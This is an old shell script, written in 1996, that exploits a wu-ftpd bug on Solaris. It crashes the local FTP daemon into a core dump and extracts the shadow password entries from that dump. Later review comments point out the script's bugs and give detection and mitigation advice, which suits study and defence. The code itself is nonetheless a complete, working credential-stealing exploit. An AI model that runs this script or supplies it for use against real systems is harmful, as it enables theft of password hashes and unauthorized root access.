#!/bin/sh
#
# exploit a bug in wu-ftpd to assemble & view the shadow passwd file
#
# Tested under Solaris 2.5
#
# James Abendschan  jwa@nbs.nau.edu  16 Oct 1996

# Account name of the invoking user; reused as the FTP login name and as the
# suffix of the scratch directory below.
USER=`whoami`
# Prompt for that account's password (/usr/ucb/echo is used for -n, i.e. no
# trailing newline after the prompt).
# NOTE(review): nothing here disables terminal echo, so the password is shown
# as it is typed; it is then fed to ftp through the here-document below.
/usr/ucb/echo -n "Enter your password for localhost: "
read PASS

# Per-user scratch directory under /tmp. The script later tests for a file
# named "core" in it and writes the strings output there.
# NOTE(review): the name is predictable, the expansions are unquoted, mkdir's
# exit status is not checked and no mode is set, so who can read what lands in
# this directory depends on the caller's umask.
WDIR=/tmp/wu-ftpd-sploit.$USER
rm -rf $WDIR
mkdir $WDIR
# NOTE(review): TMP is referenced only by the final rm. The strings output is
# written to $WDIR/tmp, not to this path, so this file is never created.
TMP=$WDIR/strings.tmp

# Scripted FTP session against the local daemon (-n: no auto-login):
#   1. authenticate as the invoking user with raw USER/PASS commands,
#   2. change into the scratch directory,
#   3. issue a second login as root with a fixed password ("woot"),
#   4. send PASV.
# The script expects the daemon to have left a core file in $WDIR afterwards.
# NOTE(review): why this sequence crashes ftpd, and why the core would hold
# shadow entries, is not visible in this file -- presumably the root login
# attempt makes the daemon read the shadow database before it crashes;
# confirm against the vendor advisory for the installed wu-ftpd.
# Defensive view: the observable traces are the session pattern (a second
# USER after a successful login, followed by PASV), an abnormal ftpd exit,
# and a core file in a user-writable directory. A core size limit of 0
# (`ulimit -c 0`) in the daemon's start-up environment keeps daemon memory
# off disk; a fixed ftpd build addresses the crash itself.
ftp -n localhost << _EOF_
quote user $USER
quote pass $PASS
cd $WDIR
user root woot
quote pasv
_EOF_

# No core file in the scratch directory means the daemon did not crash there
# (or core dumps are disabled); report and stop with a non-zero status.
if [ ! -f $WDIR/core ]
then
 echo "Sorry, your ftpd didn't dump core."
 exit 1
fi

# Extract the printable strings from the core image into $WDIR/tmp.
strings $WDIR/core > $WDIR/tmp

# For every account name in /etc/passwd (first colon-separated field), print
# the lines of the strings output that begin with "name:".
# (The original author notes this would be easier in perl.)
# NOTE(review): `echo $line` is unquoted, so several matches for one name are
# joined onto a single line, and a name with no match prints an empty line.

for user in `cat /etc/passwd | awk -F":" '{print $1}'`
do 
 line=`grep \^${user}: $WDIR/tmp`
 echo $line
done 

# NOTE(review): this removes $TMP, which was never written. The core file and
# $WDIR/tmp remain in the scratch directory, so on a host where this script
# was run /tmp/wu-ftpd-sploit.<user>/ still holds the dumped daemon memory and
# the extracted strings, readable according to the modes noted above.
rm -f $TMP